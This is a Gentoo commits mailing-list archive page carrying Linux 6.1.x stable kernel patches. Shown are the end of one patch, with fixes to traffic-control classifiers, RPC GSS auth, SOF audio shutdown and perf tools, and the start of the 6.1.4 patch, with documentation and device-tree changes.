+-	if (old_r)
++	if (r)
+ 		cr = r->res;
+ 
+ 	err = -EBUSY;
+@@ -478,14 +478,6 @@ tcindex_set_parms(struct net *net, struct tcf_proto *tp, unsigned long base,
+ 		tcf_bind_filter(tp, &cr, base);
+ 	}
+ 
+-	if (old_r && old_r != r) {
+-		err = tcindex_filter_result_init(old_r, cp, net);
+-		if (err < 0) {
+-			kfree(f);
+-			goto errout_alloc;
+-		}
+-	}
+-
+ 	oldp = p;
+ 	r->res = cr;
+ 	tcf_exts_change(&r->exts, &e);
+diff --git a/net/sched/sch_atm.c b/net/sched/sch_atm.c
+index f52255fea652b..4a981ca90b0bf 100644
+--- a/net/sched/sch_atm.c
++++ b/net/sched/sch_atm.c
+@@ -393,10 +393,13 @@ static int atm_tc_enqueue(struct sk_buff *skb, struct Qdisc *sch,
+ 				result = tcf_classify(skb, NULL, fl, &res, true);
+ 				if (result < 0)
+ 					continue;
++				if (result == TC_ACT_SHOT)
++					goto done;
++
+ 				flow = (struct atm_flow_data *)res.class;
+ 				if (!flow)
+ 					flow = lookup_flow(sch, res.classid);
+-				goto done;
++				goto drop;
+ 			}
+ 		}
+ 		flow = NULL;
+diff --git a/net/sched/sch_cbq.c b/net/sched/sch_cbq.c
+index 6568e17c4c634..36db5f6782f2c 100644
+--- a/net/sched/sch_cbq.c
++++ b/net/sched/sch_cbq.c
+@@ -230,6 +230,8 @@ cbq_classify(struct sk_buff *skb, struct Qdisc *sch, int *qerr)
+ 		result = tcf_classify(skb, NULL, fl, &res, true);
+ 		if (!fl || result < 0)
+ 			goto fallback;
++		if (result == TC_ACT_SHOT)
++			return NULL;
+ 
+ 		cl = (void *)res.class;
+ 		if (!cl) {
+@@ -250,8 +252,6 @@ cbq_classify(struct sk_buff *skb, struct Qdisc *sch, int *qerr)
+ 		case TC_ACT_TRAP:
+ 			*qerr = NET_XMIT_SUCCESS | __NET_XMIT_STOLEN;
+ 			fallthrough;
+-		case TC_ACT_SHOT:
+-			return NULL;
+ 		case TC_ACT_RECLASSIFY:
+ 			return cbq_reclassify(skb, cl);
+ 		}
+diff --git a/net/sunrpc/auth_gss/auth_gss.c b/net/sunrpc/auth_gss/auth_gss.c
+index 7bb247c51e2f6..2d7b1e03110ae 100644
+--- a/net/sunrpc/auth_gss/auth_gss.c
++++ b/net/sunrpc/auth_gss/auth_gss.c
+@@ -302,7 +302,7 @@ __gss_find_upcall(struct rpc_pipe *pipe, kuid_t uid, const struct gss_auth *auth
+ 	list_for_each_entry(pos, &pipe->in_downcall, list) {
+ 		if (!uid_eq(pos->uid, uid))
+ 			continue;
+-		if (auth && pos->auth->service != auth->service)
++		if (pos->auth->service != auth->service)
+ 			continue;
+ 		refcount_inc(&pos->count);
+ 		return pos;
+@@ -686,6 +686,21 @@ out:
+ 	return err;
+ }
+ 
++static struct gss_upcall_msg *
++gss_find_downcall(struct rpc_pipe *pipe, kuid_t uid)
++{
++	struct gss_upcall_msg *pos;
++	list_for_each_entry(pos, &pipe->in_downcall, list) {
++		if (!uid_eq(pos->uid, uid))
++			continue;
++		if (!rpc_msg_is_inflight(&pos->msg))
++			continue;
++		refcount_inc(&pos->count);
++		return pos;
++	}
++	return NULL;
++}
++
+ #define MSG_BUF_MAXSIZE 1024
+ 
+ static ssize_t
+@@ -732,7 +747,7 @@ gss_pipe_downcall(struct file *filp, const char __user *src, size_t mlen)
+ 	err = -ENOENT;
+ 	/* Find a matching upcall */
+ 	spin_lock(&pipe->lock);
+-	gss_msg = __gss_find_upcall(pipe, uid, NULL);
++	gss_msg = gss_find_downcall(pipe, uid);
+ 	if (gss_msg == NULL) {
+ 		spin_unlock(&pipe->lock);
+ 		goto err_put_ctx;
+diff --git a/sound/soc/intel/boards/bytcr_rt5640.c b/sound/soc/intel/boards/bytcr_rt5640.c
+index fb9d9e271845d..ddd2625bed90d 100644
+--- a/sound/soc/intel/boards/bytcr_rt5640.c
++++ b/sound/soc/intel/boards/bytcr_rt5640.c
+@@ -570,6 +570,21 @@ static const struct dmi_system_id byt_rt5640_quirk_table[] = {
+ 					BYT_RT5640_SSP0_AIF1 |
+ 					BYT_RT5640_MCLK_EN),
+ 	},
++	{
++		/* Advantech MICA-071 */
++		.matches = {
++			DMI_EXACT_MATCH(DMI_SYS_VENDOR, "Advantech"),
++			DMI_EXACT_MATCH(DMI_PRODUCT_NAME, "MICA-071"),
++		},
++		/* OVCD Th = 1500uA to reliable detect head-phones vs -set */
++		.driver_data = (void *)(BYT_RT5640_IN3_MAP |
++					BYT_RT5640_JD_SRC_JD2_IN4N |
++					BYT_RT5640_OVCD_TH_1500UA |
++					BYT_RT5640_OVCD_SF_0P75 |
++					BYT_RT5640_MONO_SPEAKER |
++					BYT_RT5640_DIFF_MIC |
++					BYT_RT5640_MCLK_EN),
++	},
+ 	{
+ 		.matches = {
+ 			DMI_EXACT_MATCH(DMI_SYS_VENDOR, "ARCHOS"),
+diff --git a/sound/soc/sof/core.c b/sound/soc/sof/core.c
+index 3e6141d03770f..625977a29d8a8 100644
+--- a/sound/soc/sof/core.c
++++ b/sound/soc/sof/core.c
+@@ -475,19 +475,10 @@ EXPORT_SYMBOL(snd_sof_device_remove);
+ int snd_sof_device_shutdown(struct device *dev)
+ {
+ 	struct snd_sof_dev *sdev = dev_get_drvdata(dev);
+-	struct snd_sof_pdata *pdata = sdev->pdata;
+ 
+ 	if (IS_ENABLED(CONFIG_SND_SOC_SOF_PROBE_WORK_QUEUE))
+ 		cancel_work_sync(&sdev->probe_work);
+ 
+-	/*
+-	 * make sure clients and machine driver(s) are unregistered to force
+-	 * all userspace devices to be closed prior to the DSP shutdown sequence
+-	 */
+-	sof_unregister_clients(sdev);
+-
+-	snd_sof_machine_unregister(sdev, pdata);
+-
+ 	if (sdev->fw_state == SOF_FW_BOOT_COMPLETE)
+ 		return snd_sof_shutdown(sdev);
+ 
+diff --git a/sound/soc/sof/intel/hda-dsp.c b/sound/soc/sof/intel/hda-dsp.c
+index 3c76f843454b6..428aee8fd93b1 100644
+--- a/sound/soc/sof/intel/hda-dsp.c
++++ b/sound/soc/sof/intel/hda-dsp.c
+@@ -903,6 +903,78 @@ int hda_dsp_suspend(struct snd_sof_dev *sdev, u32 target_state)
+ 	return snd_sof_dsp_set_power_state(sdev, &target_dsp_state);
+ }
+ 
++static unsigned int hda_dsp_check_for_dma_streams(struct snd_sof_dev *sdev)
++{
++	struct hdac_bus *bus = sof_to_bus(sdev);
++	struct hdac_stream *s;
++	unsigned int active_streams = 0;
++	int sd_offset;
++	u32 val;
++
++	list_for_each_entry(s, &bus->stream_list, list) {
++		sd_offset = SOF_STREAM_SD_OFFSET(s);
++		val = snd_sof_dsp_read(sdev, HDA_DSP_HDA_BAR,
++				       sd_offset);
++		if (val & SOF_HDA_SD_CTL_DMA_START)
++			active_streams |= BIT(s->index);
++	}
++
++	return active_streams;
++}
++
++static int hda_dsp_s5_quirk(struct snd_sof_dev *sdev)
++{
++	int ret;
++
++	/*
++	 * Do not assume a certain timing between the prior
++	 * suspend flow, and running of this quirk function.
++	 * This is needed if the controller was just put
++	 * to reset before calling this function.
++	 */
++	usleep_range(500, 1000);
++
++	/*
++	 * Take controller out of reset to flush DMA
++	 * transactions.
++	 */
++	ret = hda_dsp_ctrl_link_reset(sdev, false);
++	if (ret < 0)
++		return ret;
++
++	usleep_range(500, 1000);
++
++	/* Restore state for shutdown, back to reset */
++	ret = hda_dsp_ctrl_link_reset(sdev, true);
++	if (ret < 0)
++		return ret;
++
++	return ret;
++}
++
++int hda_dsp_shutdown_dma_flush(struct snd_sof_dev *sdev)
++{
++	unsigned int active_streams;
++	int ret, ret2;
++
++	/* check if DMA cleanup has been successful */
++	active_streams = hda_dsp_check_for_dma_streams(sdev);
++
++	sdev->system_suspend_target = SOF_SUSPEND_S3;
++	ret = snd_sof_suspend(sdev->dev);
++
++	if (active_streams) {
++		dev_warn(sdev->dev,
++			 "There were active DSP streams (%#x) at shutdown, trying to recover\n",
++			 active_streams);
++		ret2 = hda_dsp_s5_quirk(sdev);
++		if (ret2 < 0)
++			dev_err(sdev->dev, "shutdown recovery failed (%d)\n", ret2);
++	}
++
++	return ret;
++}
++
+ int hda_dsp_shutdown(struct snd_sof_dev *sdev)
+ {
+ 	sdev->system_suspend_target = SOF_SUSPEND_S3;
+diff --git a/sound/soc/sof/intel/hda.h b/sound/soc/sof/intel/hda.h
+index 2ab3c3840b926..9acd21901e68c 100644
+--- a/sound/soc/sof/intel/hda.h
++++ b/sound/soc/sof/intel/hda.h
+@@ -581,6 +581,7 @@ int hda_dsp_resume(struct snd_sof_dev *sdev);
+ int hda_dsp_runtime_suspend(struct snd_sof_dev *sdev);
+ int hda_dsp_runtime_resume(struct snd_sof_dev *sdev);
+ int hda_dsp_runtime_idle(struct snd_sof_dev *sdev);
++int hda_dsp_shutdown_dma_flush(struct snd_sof_dev *sdev);
+ int hda_dsp_shutdown(struct snd_sof_dev *sdev);
+ int hda_dsp_set_hw_params_upon_resume(struct snd_sof_dev *sdev);
+ void hda_dsp_dump(struct snd_sof_dev *sdev, u32 flags);
+diff --git a/sound/soc/sof/intel/tgl.c b/sound/soc/sof/intel/tgl.c
+index 9ae2890e9dac4..8637fe102c87c 100644
+--- a/sound/soc/sof/intel/tgl.c
++++ b/sound/soc/sof/intel/tgl.c
+@@ -60,7 +60,7 @@ int sof_tgl_ops_init(struct snd_sof_dev *sdev)
+ 	memcpy(&sof_tgl_ops, &sof_hda_common_ops, sizeof(struct snd_sof_dsp_ops));
+ 
+ 	/* probe/remove/shutdown */
+-	sof_tgl_ops.shutdown	= hda_dsp_shutdown;
++	sof_tgl_ops.shutdown	= hda_dsp_shutdown_dma_flush;
+ 
+ 	if (sdev->pdata->ipc_type == SOF_IPC) {
+ 		/* doorbell */
+diff --git a/sound/soc/sof/mediatek/mtk-adsp-common.c b/sound/soc/sof/mediatek/mtk-adsp-common.c
+index 1e0769c668a7b..de8dbe27cd0de 100644
+--- a/sound/soc/sof/mediatek/mtk-adsp-common.c
++++ b/sound/soc/sof/mediatek/mtk-adsp-common.c
+@@ -60,7 +60,7 @@ void mtk_adsp_dump(struct snd_sof_dev *sdev, u32 flags)
+ {
+ 	char *level = (flags & SOF_DBG_DUMP_OPTIONAL) ? KERN_DEBUG : KERN_ERR;
+ 	struct sof_ipc_dsp_oops_xtensa xoops;
+-	struct sof_ipc_panic_info panic_info;
++	struct sof_ipc_panic_info panic_info = {};
+ 	u32 stack[MTK_ADSP_STACK_DUMP_SIZE];
+ 	u32 status;
+ 
+diff --git a/tools/perf/builtin-lock.c b/tools/perf/builtin-lock.c
+index 66520712a1675..470106643ed52 100644
+--- a/tools/perf/builtin-lock.c
++++ b/tools/perf/builtin-lock.c
+@@ -1582,6 +1582,7 @@ static int __cmd_report(bool display_info)
+ 
+ 	/* for lock function check */
+ 	symbol_conf.sort_by_name = true;
++	symbol_conf.allow_aliases = true;
+ 	symbol__init(&session->header.env);
+ 
+ 	if (!perf_session__has_traces(session, "lock record"))
+@@ -1660,6 +1661,7 @@ static int __cmd_contention(int argc, const char **argv)
+ 
+ 	/* for lock function check */
+ 	symbol_conf.sort_by_name = true;
++	symbol_conf.allow_aliases = true;
+ 	symbol__init(&session->header.env);
+ 
+ 	if (use_bpf) {
+diff --git a/tools/perf/util/bpf_counter_cgroup.c b/tools/perf/util/bpf_counter_cgroup.c
+index 3c2df7522f6fc..1c82377ed78b9 100644
+--- a/tools/perf/util/bpf_counter_cgroup.c
++++ b/tools/perf/util/bpf_counter_cgroup.c
+@@ -116,27 +116,19 @@ static int bperf_load_program(struct evlist *evlist)
+ 
+ 			/* open single copy of the events w/o cgroup */
+ 			err = evsel__open_per_cpu(evsel, evsel->core.cpus, -1);
+-			if (err) {
+-				pr_err("Failed to open first cgroup events\n");
+-				goto out;
+-			}
++			if (err == 0)
++				evsel->supported = true;
+ 
+ 			map_fd = bpf_map__fd(skel->maps.events);
+ 			perf_cpu_map__for_each_cpu(cpu, j, evsel->core.cpus) {
+ 				int fd = FD(evsel, j);
+ 				__u32 idx = evsel->core.idx * total_cpus + cpu.cpu;
+ 
+-				err = bpf_map_update_elem(map_fd, &idx, &fd,
+-							  BPF_ANY);
+-				if (err < 0) {
+-					pr_err("Failed to update perf_event fd\n");
+-					goto out;
+-				}
++				bpf_map_update_elem(map_fd, &idx, &fd, BPF_ANY);
+ 			}
+ 
+ 			evsel->cgrp = leader_cgrp;
+ 		}
+-		evsel->supported = true;
+ 
+ 		if (evsel->cgrp == cgrp)
+ 			continue;
+diff --git a/tools/perf/util/cgroup.c b/tools/perf/util/cgroup.c
+index e99b41f9be45a..cd978c240e0dd 100644
+--- a/tools/perf/util/cgroup.c
++++ b/tools/perf/util/cgroup.c
+@@ -224,6 +224,19 @@ static int add_cgroup_name(const char *fpath, const struct stat *sb __maybe_unus
+ 	return 0;
+ }
+ 
++static int check_and_add_cgroup_name(const char *fpath)
++{
++	struct cgroup_name *cn;
++
++	list_for_each_entry(cn, &cgroup_list, list) {
++		if (!strcmp(cn->name, fpath))
++			return 0;
++	}
++
++	/* pretend if it's added by ftw() */
++	return add_cgroup_name(fpath, NULL, FTW_D, NULL);
++}
++
+ static void release_cgroup_list(void)
+ {
+ 	struct cgroup_name *cn;
+@@ -242,7 +255,7 @@ static int list_cgroups(const char *str)
+ 	struct cgroup_name *cn;
+ 	char *s;
+ 
+-	/* use given name as is - for testing purpose */
++	/* use given name as is when no regex is given */
+ 	for (;;) {
+ 		p = strchr(str, ',');
+ 		e = p ? p : eos;
+@@ -253,13 +266,13 @@ static int list_cgroups(const char *str)
+ 			s = strndup(str, e - str);
+ 			if (!s)
+ 				return -1;
+-			/* pretend if it's added by ftw() */
+-			ret = add_cgroup_name(s, NULL, FTW_D, NULL);
++
++			ret = check_and_add_cgroup_name(s);
+ 			free(s);
+-			if (ret)
++			if (ret < 0)
+ 				return -1;
+ 		} else {
+-			if (add_cgroup_name("", NULL, FTW_D, NULL) < 0)
++			if (check_and_add_cgroup_name("/") < 0)
+ 				return -1;
+ 		}
+ 
+diff --git a/tools/perf/util/data.c b/tools/perf/util/data.c
+index a7f68c309545d..fc16299c915f9 100644
+--- a/tools/perf/util/data.c
++++ b/tools/perf/util/data.c
+@@ -132,6 +132,7 @@ int perf_data__open_dir(struct perf_data *data)
+ 		file->size = st.st_size;
+ 	}
+ 
++	closedir(dir);
+ 	if (!files)
+ 		return -EINVAL;
+ 
+@@ -140,6 +141,7 @@ int perf_data__open_dir(struct perf_data *data)
+ 	return 0;
+ 
+ out_err:
++	closedir(dir);
+ 	close_dir(files, nr);
+ 	return ret;
+ }
+diff --git a/tools/perf/util/dwarf-aux.c b/tools/perf/util/dwarf-aux.c
+index 609ca16715018..623527edeac1e 100644
+--- a/tools/perf/util/dwarf-aux.c
++++ b/tools/perf/util/dwarf-aux.c
+@@ -308,26 +308,13 @@ static int die_get_attr_udata(Dwarf_Die *tp_die, unsigned int attr_name,
+ {
+ 	Dwarf_Attribute attr;
+ 
+-	if (dwarf_attr(tp_die, attr_name, &attr) == NULL ||
++	if (dwarf_attr_integrate(tp_die, attr_name, &attr) == NULL ||
+ 	    dwarf_formudata(&attr, result) != 0)
+ 		return -ENOENT;
+ 
+ 	return 0;
+ }
+ 
+-/* Get attribute and translate it as a sdata */
+-static int die_get_attr_sdata(Dwarf_Die *tp_die, unsigned int attr_name,
+-			      Dwarf_Sword *result)
+-{
+-	Dwarf_Attribute attr;
+-
+-	if (dwarf_attr(tp_die, attr_name, &attr) == NULL ||
+-	    dwarf_formsdata(&attr, result) != 0)
+-		return -ENOENT;
+-
+-	return 0;
+-}
+-
+ /**
+  * die_is_signed_type - Check whether a type DIE is signed or not
+  * @tp_die: a DIE of a type
+@@ -467,9 +454,9 @@ int die_get_data_member_location(Dwarf_Die *mb_die, Dwarf_Word *offs)
+ /* Get the call file index number in CU DIE */
+ static int die_get_call_fileno(Dwarf_Die *in_die)
+ {
+-	Dwarf_Sword idx;
++	Dwarf_Word idx;
+ 
+-	if (die_get_attr_sdata(in_die, DW_AT_call_file, &idx) == 0)
++	if (die_get_attr_udata(in_die, DW_AT_call_file, &idx) == 0)
+ 		return (int)idx;
+ 	else
+ 		return -ENOENT;
+@@ -478,9 +465,9 @@ static int die_get_call_fileno(Dwarf_Die *in_die)
+ /* Get the declared file index number in CU DIE */
+ static int die_get_decl_fileno(Dwarf_Die *pdie)
+ {
+-	Dwarf_Sword idx;
++	Dwarf_Word idx;
+ 
+-	if (die_get_attr_sdata(pdie, DW_AT_decl_file, &idx) == 0)
++	if (die_get_attr_udata(pdie, DW_AT_decl_file, &idx) == 0)
+ 		return (int)idx;
+ 	else
+ 		return -ENOENT;
+diff --git a/tools/testing/selftests/net/arp_ndisc_evict_nocarrier.sh b/tools/testing/selftests/net/arp_ndisc_evict_nocarrier.sh
+index b5af08af85595..4a110bb01e53e 100755
+--- a/tools/testing/selftests/net/arp_ndisc_evict_nocarrier.sh
++++ b/tools/testing/selftests/net/arp_ndisc_evict_nocarrier.sh
+@@ -18,14 +18,15 @@ readonly V4_ADDR1=10.0.10.2
+ readonly V6_ADDR0=2001:db8:91::1
+ readonly V6_ADDR1=2001:db8:91::2
+ nsid=100
++ret=0
+ 
+ cleanup_v6()
+ {
+     ip netns del me
+     ip netns del peer
+ 
+-    sysctl -w net.ipv4.conf.veth0.ndisc_evict_nocarrier=1 >/dev/null 2>&1
+-    sysctl -w net.ipv4.conf.all.ndisc_evict_nocarrier=1 >/dev/null 2>&1
++    sysctl -w net.ipv6.conf.veth1.ndisc_evict_nocarrier=1 >/dev/null 2>&1
++    sysctl -w net.ipv6.conf.all.ndisc_evict_nocarrier=1 >/dev/null 2>&1
+ }
+ 
+ create_ns()
+@@ -61,7 +62,7 @@ setup_v6() {
+     if [ $? -ne 0 ]; then
+         cleanup_v6
+         echo "failed"
+-        exit
++        exit 1
+     fi
+ 
+     # Set veth2 down, which will put veth1 in NOCARRIER state
+@@ -88,7 +89,7 @@ setup_v4() {
+     if [ $? -ne 0 ]; then
+         cleanup_v4
+         echo "failed"
+-        exit
++        exit 1
+     fi
+ 
+     # Set veth1 down, which will put veth0 in NOCARRIER state
+@@ -115,6 +116,7 @@ run_arp_evict_nocarrier_enabled() {
+ 
+     if [ $? -eq 0 ];then
+         echo "failed"
++        ret=1
+     else
+         echo "ok"
+     fi
+@@ -134,6 +136,7 @@ run_arp_evict_nocarrier_disabled() {
+         echo "ok"
+     else
+         echo "failed"
++        ret=1
+     fi
+ 
+     cleanup_v4
+@@ -164,6 +167,7 @@ run_ndisc_evict_nocarrier_enabled() {
+ 
+     if [ $? -eq 0 ];then
+         echo "failed"
++        ret=1
+     else
+         echo "ok"
+     fi
+@@ -182,6 +186,7 @@ run_ndisc_evict_nocarrier_disabled() {
+         echo "ok"
+     else
+         echo "failed"
++        ret=1
+     fi
+ 
+     cleanup_v6
+@@ -198,6 +203,7 @@ run_ndisc_evict_nocarrier_disabled_all() {
+         echo "ok"
+     else
+         echo "failed"
++        ret=1
+     fi
+ 
+     cleanup_v6
+@@ -218,3 +224,4 @@ if [ "$(id -u)" -ne 0 ];then
+ fi
+ 
+ run_all_tests
++exit $ret


^ permalink raw reply related	[flat|nested] 161+ messages in thread
* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2023-01-07 11:10 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2023-01-07 11:10 UTC (permalink / raw
  To: gentoo-commits

commit:     09615b5d32e7712a6ef2ff3d0bb8a32d64485997
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Sat Jan  7 11:10:44 2023 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Sat Jan  7 11:10:44 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=09615b5d

Linux patch 6.1.4

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README            |    4 +
 1003_linux-6.1.4.patch | 8792 ++++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 8796 insertions(+)

diff --git a/0000_README b/0000_README
index 1fe5b8d9..9fb9179d 100644
--- a/0000_README
+++ b/0000_README
@@ -55,6 +55,10 @@ Patch:  1002_linux-6.1.3.patch
 From:   http://www.kernel.org
 Desc:   Linux 6.1.3
 
+Patch:  1003_linux-6.1.3.patch
+From:   http://www.kernel.org
+Desc:   Linux 6.1.4
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.

diff --git a/1003_linux-6.1.4.patch b/1003_linux-6.1.4.patch
new file mode 100644
index 00000000..894610d5
--- /dev/null
+++ b/1003_linux-6.1.4.patch
@@ -0,0 +1,8792 @@
+diff --git a/Documentation/admin-guide/kernel-parameters.txt b/Documentation/admin-guide/kernel-parameters.txt
+index 42af9ca0127e5..6b838869554b1 100644
+--- a/Documentation/admin-guide/kernel-parameters.txt
++++ b/Documentation/admin-guide/kernel-parameters.txt
+@@ -2300,7 +2300,13 @@
+ 			Provide an override to the IOAPIC-ID<->DEVICE-ID
+ 			mapping provided in the IVRS ACPI table.
+ 			By default, PCI segment is 0, and can be omitted.
+-			For example:
++
++			For example, to map IOAPIC-ID decimal 10 to
++			PCI segment 0x1 and PCI device 00:14.0,
++			write the parameter as:
++				ivrs_ioapic=10@0001:00:14.0
++
++			Deprecated formats:
+ 			* To map IOAPIC-ID decimal 10 to PCI device 00:14.0
+ 			  write the parameter as:
+ 				ivrs_ioapic[10]=00:14.0
+@@ -2312,7 +2318,13 @@
+ 			Provide an override to the HPET-ID<->DEVICE-ID
+ 			mapping provided in the IVRS ACPI table.
+ 			By default, PCI segment is 0, and can be omitted.
+-			For example:
++
++			For example, to map HPET-ID decimal 10 to
++			PCI segment 0x1 and PCI device 00:14.0,
++			write the parameter as:
++				ivrs_hpet=10@0001:00:14.0
++
++			Deprecated formats:
+ 			* To map HPET-ID decimal 0 to PCI device 00:14.0
+ 			  write the parameter as:
+ 				ivrs_hpet[0]=00:14.0
+@@ -2323,15 +2335,20 @@
+ 	ivrs_acpihid	[HW,X86-64]
+ 			Provide an override to the ACPI-HID:UID<->DEVICE-ID
+ 			mapping provided in the IVRS ACPI table.
++			By default, PCI segment is 0, and can be omitted.
+ 
+ 			For example, to map UART-HID:UID AMD0020:0 to
+ 			PCI segment 0x1 and PCI device ID 00:14.5,
+ 			write the parameter as:
+-				ivrs_acpihid[0001:00:14.5]=AMD0020:0
++				ivrs_acpihid=AMD0020:0@0001:00:14.5
+ 
+-			By default, PCI segment is 0, and can be omitted.
+-			For example, PCI device 00:14.5 write the parameter as:
++			Deprecated formats:
++			* To map UART-HID:UID AMD0020:0 to PCI segment is 0,
++			  PCI device ID 00:14.5, write the parameter as:
+ 				ivrs_acpihid[00:14.5]=AMD0020:0
++			* To map UART-HID:UID AMD0020:0 to PCI segment 0x1 and
++			  PCI device ID 00:14.5, write the parameter as:
++				ivrs_acpihid[0001:00:14.5]=AMD0020:0
+ 
+ 	js=		[HW,JOY] Analog joystick
+ 			See Documentation/input/joydev/joystick.rst.
+diff --git a/Documentation/filesystems/mount_api.rst b/Documentation/filesystems/mount_api.rst
+index eb358a00be279..1d16787a00e95 100644
+--- a/Documentation/filesystems/mount_api.rst
++++ b/Documentation/filesystems/mount_api.rst
+@@ -814,6 +814,7 @@ process the parameters it is given.
+        int fs_lookup_param(struct fs_context *fc,
+ 			   struct fs_parameter *value,
+ 			   bool want_bdev,
++			   unsigned int flags,
+ 			   struct path *_path);
+ 
+      This takes a parameter that carries a string or filename type and attempts
+diff --git a/Makefile b/Makefile
+index a69d14983a489..56afd1509c74f 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 1
+-SUBLEVEL = 3
++SUBLEVEL = 4
+ EXTRAVERSION =
+ NAME = Hurr durr I'ma ninja sloth
+ 
+diff --git a/arch/arm/nwfpe/Makefile b/arch/arm/nwfpe/Makefile
+index 303400fa2cdf7..2aec85ab1e8b9 100644
+--- a/arch/arm/nwfpe/Makefile
++++ b/arch/arm/nwfpe/Makefile
+@@ -11,3 +11,9 @@ nwfpe-y				+= fpa11.o fpa11_cpdo.o fpa11_cpdt.o \
+ 				   entry.o
+ 
+ nwfpe-$(CONFIG_FPE_NWFPE_XP)	+= extended_cpdo.o
++
++# Try really hard to avoid generating calls to __aeabi_uldivmod() from
++# float64_rem() due to loop elision.
++ifdef CONFIG_CC_IS_CLANG
++CFLAGS_softfloat.o	+= -mllvm -replexitval=never
++endif
+diff --git a/arch/arm64/boot/dts/mediatek/mt8195-demo.dts b/arch/arm64/boot/dts/mediatek/mt8195-demo.dts
+index 4fbd99eb496a2..dec85d2548384 100644
+--- a/arch/arm64/boot/dts/mediatek/mt8195-demo.dts
++++ b/arch/arm64/boot/dts/mediatek/mt8195-demo.dts
+@@ -56,10 +56,10 @@
+ 		#size-cells = <2>;
+ 		ranges;
+ 
+-		/* 192 KiB reserved for ARM Trusted Firmware (BL31) */
++		/* 2 MiB reserved for ARM Trusted Firmware (BL31) */
+ 		bl31_secmon_reserved: secmon@54600000 {
+ 			no-map;
+-			reg = <0 0x54600000 0x0 0x30000>;
++			reg = <0 0x54600000 0x0 0x200000>;
+ 		};
+ 
+ 		/* 12 MiB reserved for OP-TEE (BL32)
+diff --git a/arch/arm64/boot/dts/qcom/sc8280xp.dtsi b/arch/arm64/boot/dts/qcom/sc8280xp.dtsi
+index 212d63d5cbf28..9f2a136d5cbc5 100644
+--- a/arch/arm64/boot/dts/qcom/sc8280xp.dtsi
++++ b/arch/arm64/boot/dts/qcom/sc8280xp.dtsi
+@@ -855,12 +855,13 @@
+ 			required-opps = <&rpmhpd_opp_nom>;
+ 
+ 			iommus = <&apps_smmu 0xe0 0x0>;
++			dma-coherent;
+ 
+ 			clocks = <&gcc GCC_UFS_PHY_AXI_CLK>,
+ 				 <&gcc GCC_AGGRE_UFS_PHY_AXI_CLK>,
+ 				 <&gcc GCC_UFS_PHY_AHB_CLK>,
+ 				 <&gcc GCC_UFS_PHY_UNIPRO_CORE_CLK>,
+-				 <&rpmhcc RPMH_CXO_CLK>,
++				 <&gcc GCC_UFS_REF_CLKREF_CLK>,
+ 				 <&gcc GCC_UFS_PHY_TX_SYMBOL_0_CLK>,
+ 				 <&gcc GCC_UFS_PHY_RX_SYMBOL_0_CLK>,
+ 				 <&gcc GCC_UFS_PHY_RX_SYMBOL_1_CLK>;
+@@ -891,7 +892,7 @@
+ 			ranges;
+ 			clock-names = "ref",
+ 				      "ref_aux";
+-			clocks = <&gcc GCC_UFS_REF_CLKREF_CLK>,
++			clocks = <&gcc GCC_UFS_CARD_CLKREF_CLK>,
+ 				 <&gcc GCC_UFS_PHY_PHY_AUX_CLK>;
+ 
+ 			resets = <&ufs_mem_hc 0>;
+@@ -923,12 +924,13 @@
+ 			power-domains = <&gcc UFS_CARD_GDSC>;
+ 
+ 			iommus = <&apps_smmu 0x4a0 0x0>;
++			dma-coherent;
+ 
+ 			clocks = <&gcc GCC_UFS_CARD_AXI_CLK>,
+ 				 <&gcc GCC_AGGRE_UFS_CARD_AXI_CLK>,
+ 				 <&gcc GCC_UFS_CARD_AHB_CLK>,
+ 				 <&gcc GCC_UFS_CARD_UNIPRO_CORE_CLK>,
+-				 <&rpmhcc RPMH_CXO_CLK>,
++				 <&gcc GCC_UFS_REF_CLKREF_CLK>,
+ 				 <&gcc GCC_UFS_CARD_TX_SYMBOL_0_CLK>,
+ 				 <&gcc GCC_UFS_CARD_RX_SYMBOL_0_CLK>,
+ 				 <&gcc GCC_UFS_CARD_RX_SYMBOL_1_CLK>;
+@@ -959,7 +961,7 @@
+ 			ranges;
+ 			clock-names = "ref",
+ 				      "ref_aux";
+-			clocks = <&gcc GCC_UFS_REF_CLKREF_CLK>,
++			clocks = <&gcc GCC_UFS_1_CARD_CLKREF_CLK>,
+ 				 <&gcc GCC_UFS_CARD_PHY_AUX_CLK>;
+ 
+ 			resets = <&ufs_card_hc 0>;
+diff --git a/arch/arm64/boot/dts/qcom/sdm845-db845c.dts b/arch/arm64/boot/dts/qcom/sdm845-db845c.dts
+index 132417e2d11e5..a3e15dedd60cb 100644
+--- a/arch/arm64/boot/dts/qcom/sdm845-db845c.dts
++++ b/arch/arm64/boot/dts/qcom/sdm845-db845c.dts
+@@ -1123,7 +1123,10 @@
+ 
+ /* PINCTRL - additions to nodes defined in sdm845.dtsi */
+ &qup_spi2_default {
+-	drive-strength = <16>;
++	pinconf {
++		pins = "gpio27", "gpio28", "gpio29", "gpio30";
++		drive-strength = <16>;
++	};
+ };
+ 
+ &qup_uart3_default{
+diff --git a/arch/arm64/boot/dts/qcom/sdm850-lenovo-yoga-c630.dts b/arch/arm64/boot/dts/qcom/sdm850-lenovo-yoga-c630.dts
+index be59a8ba9c1fe..74f43da51fa50 100644
+--- a/arch/arm64/boot/dts/qcom/sdm850-lenovo-yoga-c630.dts
++++ b/arch/arm64/boot/dts/qcom/sdm850-lenovo-yoga-c630.dts
+@@ -487,8 +487,10 @@
+ };
+ 
+ &qup_i2c12_default {
+-	drive-strength = <2>;
+-	bias-disable;
++	pinmux {
++		drive-strength = <2>;
++		bias-disable;
++	};
+ };
+ 
+ &qup_uart6_default {
+diff --git a/arch/arm64/boot/dts/qcom/sdm850-samsung-w737.dts b/arch/arm64/boot/dts/qcom/sdm850-samsung-w737.dts
+index f954fe5cb61ab..d028a7eb364a6 100644
+--- a/arch/arm64/boot/dts/qcom/sdm850-samsung-w737.dts
